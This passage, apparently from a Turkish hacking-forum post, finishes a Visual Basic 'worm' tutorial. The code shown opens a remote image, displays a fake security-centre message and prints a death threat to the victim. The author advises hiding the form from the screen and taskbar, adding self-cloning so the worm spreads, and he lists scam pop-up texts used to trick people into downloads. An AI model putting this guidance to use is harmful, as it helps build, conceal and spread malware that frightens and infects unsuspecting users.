Shell ("C:\\Program Files\\Internet Explorer\\iexplore.exe http://www.resimarsiv.com/data/media/484/azrail-7.jpg"),vbNormalFocus
MsgBox "Secruty Center Active"
Printer.Print "Ben Azrail...Bu gece seninde bu hayattaki süren dolmuş olacak.Öleceksin..."
On Error Resume Next
End Sub

Kodlar burada bitiyor.Son kısımdaki yer ise adama korku salmak.Kendi Kendine resimler açıyor tabi bunu değiştirebilirsiniz. Shell yazan kısmın devamından değişir.

İşte bu kadar siz dediklerimi yaparsanız ufak ve her tarafa bulaşan flash v.b bir solucan(worm) yapabilirsiniz.Ama benim kodlarımlada direk yapabilirsiniz.Bide unutmadan Formun visible özelligi False olsun ve ShowİnTaskbar da false olsun ki adam göremesin.

Bu kodlar dışında bilgi vermek de istiyorum.Worm virüsü çok güzel bir virüstür aslında,bu virüs sizin yaratıcılığınıza kalmış.Mesela Klonlama özelliği yerleştirirseniz her yere kendini klonlar kullanıcı birini silse on tane daha var. İnternette de bir sürü Solucan virüsü var aslında mesela çoğu kimsenin neden çıktığını bilmediği reklamlar da bir Worm virüsü aslında aşağıda örneklerini verdim.

İnternette sörf yaparken karşımıza çıkan küçük pencerelerde ilgi çekici şeyler bulunmaktadır. Bunlara tıkladığımızda solucan virüsü taşıyan dosyalar indirir. Tıkladığımız andan itibaren virüs bilgisayarımızda etkinleşir. Bazı penceredeki yazıların örnekleri;
Tebrikler 250 sms kazandınız telefonunuza indirmek için tıklayınız.
Tebrikler Amerika'ya gitme hakkını yakalamak için ücretsiz çekiliş kazandınız.
Tebrikler Amerika kapınızda.
Visa kartınıza bonus kazandınız.
Sitemize giren 1.000.000. kişisiniz. Bizden hediye şarkı kazandınız.
Bugün şanslı gününüzdesiniz. Bizden para ödülü kazandınız.
Tebrikler bizden saat kazandınız.
Değerli yorumlarınızı ve fikirlerinizi bekliyorum. Bu yazıların bazıları alıntıdır. Ama alıntı olarak tıpa tıp aynısını yazmadım bazı dokunuşlar yaptım düzeltmeler ve eklemeler yaptım.

İyi Forumlar...
kSKHACK HERYERDE!!
Kodları nereye yazmalıyız?
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.